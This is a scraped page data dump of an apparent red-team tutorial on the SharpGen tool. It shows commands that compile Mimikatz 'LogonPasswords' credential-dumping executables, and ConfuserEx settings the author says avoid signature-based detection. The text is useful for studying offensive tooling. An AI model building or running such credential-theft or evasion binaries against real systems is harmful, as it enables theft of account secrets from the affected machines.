[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6dXLAANVvaS6FrJSvA8mXAkV-5JID-DrWKEM2SC3hSA":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},669,"How do I integrate a third-party open-source library like SharpWMI into SharpGen?","Copy the library's source code (e.g., SharpWMI) into `SharpGen\u002FSource`, modify the `.csproj` file to add any missing assembly references (e.g., `System.Management`), and adjust the library’s static methods to `public`. Then recompile SharpGen with `dotnet build --configuration Release`. After that, you can call the library’s methods in your SharpGen source files, such as `SharpWMI.Program.LocalWMIQuery(...)`. This technique is similar to how Covenant integrates SharpSploit – see [Covenant Utilization Analysis](\u002Fnews\u002Fcovenant-utilization-analysis) for related concepts.","\u003Cp>Copy the library&#39;s source code (e.g., SharpWMI) into `SharpGen\u002FSource`, modify the `.csproj` file to add any missing assembly references (e.g., `System.Management`), and adjust the library’s static methods to `public`. Then recompile SharpGen with `dotnet build --configuration Release`. After that, you can call the library’s methods in your SharpGen source files, such as `SharpWMI.Program.LocalWMIQuery(...)`. This technique is similar to how Covenant integrates SharpSploit – see [Covenant Utilization Analysis](\u002Fnews\u002Fcovenant-utilization-analysis) for related concepts.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fsharpgen-utilization-analysis\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-do-i-integrate-a-third-party-open-source-library-like-sharpwmi-into-sharpgen-1777482745421","SharpGen, library integration, SharpWMI, C# template, assembly references",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},166,"SharpGen Utilization Analysis","sharpgen-utilization-analysis","Learn how to use SharpGen to integrate, restructure, and encrypt .NET assemblies with Roslyn. Includes setup, compilation, and utilization methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen is a tool I consider exceptionally excellent. It can be used to integrate, restructure, and encrypt other .NET assemblies. After secondary compilation, it can generate a completely new tool.\u003C\u002Fp>\u003Cp>This article will examine the details of SharpGen, introduce detailed methods for invoking other open-source libraries, and analyze utilization approaches.\u003C\u002Fp>\u003Cp>Reference Links:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fcobbr\u002FSharpGen\u003C\u002Fp>\u003Cp>https:\u002F\u002Fcobbr.io\u002FSharpGen.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>.NET Core Development Environment Setup\u003C\u002Fli>\u003Cli>Feature Overview\u003C\u002Fli>\u003Cli>Methods for Invoking Other Open-Source Libraries\u003C\u002Fli>\u003Cli>Utilization Approaches\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 .NET Core Development Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen uses .NET Core, with the advantage of supporting multiple platforms (Linux, macOS, and Windows)\u003C\u002Fp>\u003Cp>The programming language used is C#, leveraging Roslyn to compile .NET Framework console applications or libraries\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Roslyn is a .NET compiler platform that can dynamically compile script files through the Scripting API\u003C\u002Fp>\u003Cp>Test system: Win7x64\u003C\u002Fp>\u003Cp>For the test system, I chose to install .NET Core 2.2.0, ASP.NET Core 2.2.0, and SDK 2.2.101 to ensure compatibility with another tool, Covenant\u003C\u002Fp>\u003Cp>Download links for the corresponding versions are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdotnet.microsoft.com\u002Fdownload\u002Fthank-you\u002Fdotnet-sdk-2.2.101-windows-x64-installer\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdotnet.microsoft.com\u002Fdownload\u002Fthank-you\u002Fdotnet-runtime-2.2.0-windows-x64-installer\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdotnet.microsoft.com\u002Fdownload\u002Fthank-you\u002Fdotnet-runtime-2.2.0-windows-x64-asp.net-core-runtime-installer\u003C\u002Fp>\u003Cp>Install Git for Windows, download link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgit-for-windows\u002Fgit\u002Freleases\u002Fdownload\u002Fv2.23.0.windows.1\u002FGit-2.23.0-64-bit.exe\u003C\u002Fp>\u003Cp>Download, install, and compile SharpGen:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone https:\u002F\u002Fgithub.com\u002Fcobbr\u002FSharpGen\u003Cbr>cd SharpGen\u003Cbr>dotnet build --configuration Release\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Basic Function Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen comes pre-integrated with SharpSploit, allowing direct invocation of its functionalities\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Options:\u003Cbr>  -? | -h | --help                                     Show help information\u003Cbr>  -f | --file \u003Coutput_file>                            The output file to write to.\u003Cbr>  -d | --dotnet | --dotnet-framework \u003Cdotnet_version>  The Dotnet Framework version to target (net35 or net40).\u003Cbr>  -o | --output-kind \u003Coutput_kind>                     The OutputKind to use (console or dll).\u003Cbr>  -p | --platform \u003Cplatform>                           The Platform to use (AnyCpy, x86, or x64).\u003Cbr>  -n | --no-optimization                               Don't use source code optimization.\u003Cbr>  -a | --assembly-name \u003Cassembly_name>                 The name of the assembly to be generated.\u003Cbr>  -s | --source-file \u003Csource_file>                     The source code to compile.\u003Cbr>  -c | --class-name \u003Cclass_name>                       The name of the class to be generated.\u003Cbr>  --confuse \u003Cconfuserex_project_file>                  The ConfuserEx ProjectFile configuration.\u003C\u002Fconfuserex_project_file>\u003C\u002Fclass_name>\u003C\u002Fsource_file>\u003C\u002Fassembly_name>\u003C\u002Fplatform>\u003C\u002Foutput_kind>\u003C\u002Fdotnet_version>\u003C\u002Foutput_file>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1. Compile single-line code\u003C\u002Fh3>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe \"Console.WriteLine(Mimikatz.LogonPasswords());\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution process displays the auto-completed compilation code, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017272301_0_4206db1cdf.jpeg\">\u003C\u002Fp>\u003Cp>Notably, the random class name ohq8r7eQ1qK changes each time a file is generated\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>To specify a class name, add the\u003Cstrong>-c\u003C\u002Fstrong>parameter, example as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -c abcde12345 -f example.exe \"Console.WriteLine(Mimikatz.LogonPasswords());\" \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After command execution, example.exe is generated, which will invoke Mimikatz's sekurlsa::logonpasswords command\u003C\u002Fp>\u003Ch3>2. Compile the complete code file\u003C\u002Fh3>\u003Cp>The content of example.txt is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using SharpSploit.Execution;\u003Cbr>using SharpSploit.Credentials;\u003Cbr>\u003Cbr>class Program\u003Cbr>{\u003Cbr>    static void Main()\u003Cbr>    {\u003Cbr>        Console.WriteLine(Mimikatz.LogonPasswords());\u003Cbr>        return;\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --source-file example.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution process displays compiled code, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017300995_1_80d905247f.jpeg\">\u003C\u002Fp>\u003Cp>Since the class name is specified as Program, the random class name feature is no longer available\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>SharpGen uses Roslyn for dynamic compilation, resulting in different file hashes for each generation\u003C\u002Fp>\u003Ch2>0x04 Advanced Features\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Reduce the size of generated files\u003C\u002Fh3>\u003Ch4>(1) Remove references to specified DLLs\u003C\u002Fh4>\u003Cp>Edit the file SharpGen\u002FReferences\u002Freferences.yml\u003C\u002Fp>\u003Cp>The DLLs here are typically reference files used by C# programs\u003C\u002Fp>\u003Cp>Change the Enabled property from true to false for unnecessary DLL names\u003C\u002Fp>\u003Ch4>(2) Remove references to specified DLLs\u003C\u002Fh4>\u003Cp>Edit the file SharpGen\u002FResources\u002Fresources.yml\u003C\u002Fp>\u003Cp>The DLLs here implement mimikatz functionality\u003C\u002Fp>\u003Cp>Change the Enabled property of unwanted dll names from true to false\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>powerkatz_x64.dll is the 64-bit version of mimikatz\u003C\u002Fli>\u003Cli>powerkatz_x64.dll.comp is the compressed 64-bit mimikatz using the System.IO.Compression library\u003C\u002Fli>\u003Cli>powerkatz_x86.dll is the 32-bit version of mimikatz\u003C\u002Fli>\u003Cli>powerkatz_x86.dll.comp is the compressed 32-bit mimikatz using the System.IO.Compression library\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(3) Using ConfuserEx resource protection\u003C\u002Fh4>\u003Cp>ConfuserEx resource protection encrypts and compresses resources with LZMA\u003C\u002Fp>\u003Cp>Example command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --confuse confuse.cr \"Console.WriteLine(Mimikatz.LogonPasswords());\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Calling other open-source libraries\u003C\u002Fh3>\u003Cp>This part is not covered in the reference materials; here is my solution\u003C\u002Fp>\u003Cp>Two examples are provided here: one is the open-source SharpWMI, and the other is my own template SharpTest\u003C\u002Fp>\u003Ch4>1. Adding calls to SharpWMI\u003C\u002Fh4>\u003Cp>(1) Copy the SharpWMI source code to SharpGen\u002FSource\u003C\u002Fp>\u003Cp>(2) Modify SharpGen\u002FSharpGen.csproj\u003C\u002Fp>\u003Cp>Add \u003Ccompile remove=\"Source\\SharpWMI\\Program.cs\"> to the ItemGroup tag\u003C\u002Fcompile>\u003C\u002Fp>\u003Cp>Otherwise, an error will be reported when compiling SharpGen:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Source\\SharpWMI\\Program.cs(3,14): error CS0234: The type or namespace name 'Management' does not exist in the namespace 'System' (are you missing an assembly reference?)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Modify the source code of SharpWMI\u003C\u002Fp>\u003Cp>Keep only Program.cs, delete the Main function, and change each static method in Program.cs to a public method\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Cp>static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = \"\") needs to be modified to public static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = \"\")\u003C\u002Fp>\u003Cp>(4) Recompile SharpGen\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet build --configuration Release\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Call test\u003C\u002Fp>\u003Cp>The function of example.txt is to call the LocalWMIQuery method in SharpWMI to query win32_ComputerSystem, with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpWMI.Program.LocalWMIQuery(\"select * from win32_ComputerSystem\");\u003Cbr>Console.WriteLine(Host.GetProcessList());\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The commands for SharpGen are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --source-file example.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate example.ex and execute it, the call is successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017325848_2_83445b7252.jpeg\">\u003C\u002Fp>\u003Ch4>2. Add self-written C# template\u003C\u002Fh4>\u003Cp>Name it SharpTest, with the function of receiving parameters and outputting to the command line\u003C\u002Fp>\u003Cp>(1) Create a new folder SharpTest, and create a new file Program.cs inside, with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Management;\u003Cbr>namespace SharpTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        public static void TestMethod(string string1)\u003Cbr>        {\u003Cbr>            Console.WriteLine(string1);\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Modify SharpGen\u002FSharpGen.csproj\u003C\u002Fp>\u003Cp>Add \u003Ccompile remove=\"Source\\SharpTest\\Program.cs\"> within the ItemGroup tag.\u003C\u002Fcompile>\u003C\u002Fp>\u003Cp>(3) Recompile SharpGen\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet build --configuration Release\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Invoke the test\u003C\u002Fp>\u003Cp>The function of example.txt is to call the TestMethod in SharpTest with the parameter 123456, with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpTest.Program.TestMethod(\"123456\");\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command for SharpGen is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --source-file example.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate example.exe and execute it, the call is successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017376915_3_f33a84b7f8.jpeg\">\u003C\u002Fp>\u003Cp>For testing convenience, I have forked cobbr's SharpGen and added calls to SharpWMI and SharpTest. The address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch3>3. Resource Protection\u003C\u002Fh3>\u003Cp>Using the new version of ConfuserEx can protect the resources of compiled files. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmkaring\u002FConfuserEx\u003C\u002Fp>\u003Cp>The old version of ConfuserEx is no longer maintained. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fyck1509\u002FConfuserEx\u003C\u002Fp>\u003Cp>Example command call:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --confuse confuse.cr \"Console.WriteLine(Mimikatz.LogonPasswords());\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding configuration file used is SharpGen\u002Fconfuse.cr\u003C\u002Fp>\u003Cp>The default configuration is to encrypt resources and apply LZMA compression\u003C\u002Fp>\u003Cp>ConfuserEx also supports other protection features:\u003C\u002Fp>\u003Cul>\u003Cli>Anti Debug Protection\u003C\u002Fli>\u003Cli>Anti Dump Protection\u003C\u002Fli>\u003Cli>Anti IL Dasm Protection\u003C\u002Fli>\u003Cli>Anti Tamper Protection\u003C\u002Fli>\u003Cli>Constants Protection\u003C\u002Fli>\u003Cli>Control Flow Protection\u003C\u002Fli>\u003Cli>Invalid Metadata Protection\u003C\u002Fli>\u003Cli>Name Protection\u003C\u002Fli>\u003Cli>Reference Proxy Protection\u003C\u002Fli>\u003Cli>Resources Protection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simply remove the corresponding comments in SharpGen\u002Fconfuse.cr\u003C\u002Fp>\u003Cp>For example, to add anti-debug functionality, the configuration file confuse.cr content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cproject basedir=\"{0}\" outputdir=\"{1}\" xmlns=\"http:\u002F\u002Fconfuser.codeplex.com\">\u003Cbr>    \u003Cmodule path=\"{2}\">\u003Cbr>      \u003Crule pattern=\"true\" inherit=\"false\">\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti debug\" \u002F>       -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti dump\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti ildasm\" \u002F>      -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"anti tamper\" \u002F>      -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"constants\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"ctrl flow\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"invalid metadata\" \u002F> -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"ref proxy\" \u002F>        -->\u003Cbr>         \u003C!-- \u003Cprotection id=\"rename\" \u002F>           -->\u003Cbr>         \u003Cprotection id=\"resources\">\u003Cbr>         \u003Cprotection id=\"anti debug\">\u003Cbr>      \u003C\u002Fprotection>\u003C\u002Fprotection>\u003C\u002Frule>\u003Cbr>    \u003C\u002Fmodule>\u003Cbr>\u003C\u002Fproject>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Additional note: Disabling optimization\u003C\u002Fh3>\u003Cp>SharpGen optimizes source code during compilation. Optimization can be disabled using the --no-optimization parameter, which will increase the size of the generated file.\u003C\u002Fp>\u003Ch2>0x05 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen can serve as a platform for repackaging .NET assemblies, offering the following advantages:\u003C\u002Fp>\u003Cul>\u003Cli>Utilizes the .NET Core platform and Roslyn for dynamic compilation, allowing developers to choose multiple platforms (Linux, macOS, and Windows) during code development.\u003C\u002Fli>\u003Cli>Can call other open-source libraries to customize functionality, ultimately packaging it into a standalone .exe or .dll file.\u003C\u002Fli>\u003Cli>Uses ConfuserEx to encrypt and compress resources, avoiding signature-based detection.\u003C\u002Fli>\u003Cli>Generated files support .NET 3.5 and .NET 4.0.\u003C\u002Fli>\u003Cli>Generated files support x86 and x64 architectures.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Furthermore, SharpGen enables rapid conversion of .NET assembly-based POCs into EXPs.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the functionality of SharpGen, shares methods for implementing calls to other open-source libraries, and analyzes the advantages of SharpGen.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen is a tool I consider exceptionally excellent. It can be used to integrate, restructure, and encrypt other .NET assemblies. After secondary compilation, it can generate a completely new tool.\u003C\u002Fp>\u003Cp>This article will examine the details of SharpGen, introduce detailed methods for invoking other open-source libraries, and analyze utilization approaches.\u003C\u002Fp>\u003Cp>Reference Links:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fcobbr\u002FSharpGen\u003C\u002Fp>\u003Cp>https:\u002F\u002Fcobbr.io\u002FSharpGen.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>.NET Core Development Environment Setup\u003C\u002Fli>\u003Cli>Feature Overview\u003C\u002Fli>\u003Cli>Methods for Invoking Other Open-Source Libraries\u003C\u002Fli>\u003Cli>Utilization Approaches\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 .NET Core Development Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen uses .NET Core, with the advantage of supporting multiple platforms (Linux, macOS, and Windows)\u003C\u002Fp>\u003Cp>The programming language used is C#, leveraging Roslyn to compile .NET Framework console applications or libraries\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Roslyn is a .NET compiler platform that can dynamically compile script files through the Scripting API\u003C\u002Fp>\u003Cp>Test system: Win7x64\u003C\u002Fp>\u003Cp>For the test system, I chose to install .NET Core 2.2.0, ASP.NET Core 2.2.0, and SDK 2.2.101 to ensure compatibility with another tool, Covenant\u003C\u002Fp>\u003Cp>Download links for the corresponding versions are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdotnet.microsoft.com\u002Fdownload\u002Fthank-you\u002Fdotnet-sdk-2.2.101-windows-x64-installer\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdotnet.microsoft.com\u002Fdownload\u002Fthank-you\u002Fdotnet-runtime-2.2.0-windows-x64-installer\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdotnet.microsoft.com\u002Fdownload\u002Fthank-you\u002Fdotnet-runtime-2.2.0-windows-x64-asp.net-core-runtime-installer\u003C\u002Fp>\u003Cp>Install Git for Windows, download link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgit-for-windows\u002Fgit\u002Freleases\u002Fdownload\u002Fv2.23.0.windows.1\u002FGit-2.23.0-64-bit.exe\u003C\u002Fp>\u003Cp>Download, install, and compile SharpGen:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone https:\u002F\u002Fgithub.com\u002Fcobbr\u002FSharpGen\u003Cbr>cd SharpGen\u003Cbr>dotnet build --configuration Release\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Basic Function Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SharpGen comes pre-integrated with SharpSploit, allowing direct invocation of its functionalities\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Options:\u003Cbr>  -? | -h | --help                                     Show help information\u003Cbr>  -f | --file \u003Coutput_file>                            The output file to write to.\u003Cbr>  -d | --dotnet | --dotnet-framework \u003Cdotnet_version>  The Dotnet Framework version to target (net35 or net40).\u003Cbr>  -o | --output-kind \u003Coutput_kind>                     The OutputKind to use (console or dll).\u003Cbr>  -p | --platform \u003Cplatform>                           The Platform to use (AnyCpy, x86, or x64).\u003Cbr>  -n | --no-optimization                               Don't use source code optimization.\u003Cbr>  -a | --assembly-name \u003Cassembly_name>                 The name of the assembly to be generated.\u003Cbr>  -s | --source-file \u003Csource_file>                     The source code to compile.\u003Cbr>  -c | --class-name \u003Cclass_name>                       The name of the class to be generated.\u003Cbr>  --confuse \u003Cconfuserex_project_file>                  The ConfuserEx ProjectFile configuration.\u003C\u002Fconfuserex_project_file>\u003C\u002Fclass_name>\u003C\u002Fsource_file>\u003C\u002Fassembly_name>\u003C\u002Fplatform>\u003C\u002Foutput_kind>\u003C\u002Fdotnet_version>\u003C\u002Foutput_file>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1. Compile single-line code\u003C\u002Fh3>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe \"Console.WriteLine(Mimikatz.LogonPasswords());\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution process displays the auto-completed compilation code, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017272301_0_4206db1cdf-1.jpeg\">\u003C\u002Fp>\u003Cp>Notably, the random class name ohq8r7eQ1qK changes each time a file is generated\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>To specify a class name, add the\u003Cstrong>-c\u003C\u002Fstrong>parameter, example as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -c abcde12345 -f example.exe \"Console.WriteLine(Mimikatz.LogonPasswords());\" \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After command execution, example.exe is generated, which will invoke Mimikatz's sekurlsa::logonpasswords command\u003C\u002Fp>\u003Ch3>2. Compile the complete code file\u003C\u002Fh3>\u003Cp>The content of example.txt is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using SharpSploit.Execution;\u003Cbr>using SharpSploit.Credentials;\u003Cbr>\u003Cbr>class Program\u003Cbr>{\u003Cbr>    static void Main()\u003Cbr>    {\u003Cbr>        Console.WriteLine(Mimikatz.LogonPasswords());\u003Cbr>        return;\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dotnet bin\u002FRelease\u002Fnetcoreapp2.1\u002FSharpGen.dll -f example.exe --source-file example.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution process displays compiled code, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017300995_1_80d905247f-1.jpeg\">\u003C\u002Fp>\u003Cp>Since the class name is specified as Program, the random class name feature is no longer available\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>SharpGen uses Roslyn for dynamic compilation, resulting in different file hashes for each generation\u003C\u002Fp>\u003Ch2>0x04 Advanced Features\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Reduce the size of generated files\u003C\u002Fh3>\u003Ch4>(1) Remove references to specified DLLs\u003C\u002Fh4>\u003Cp>Edit the file 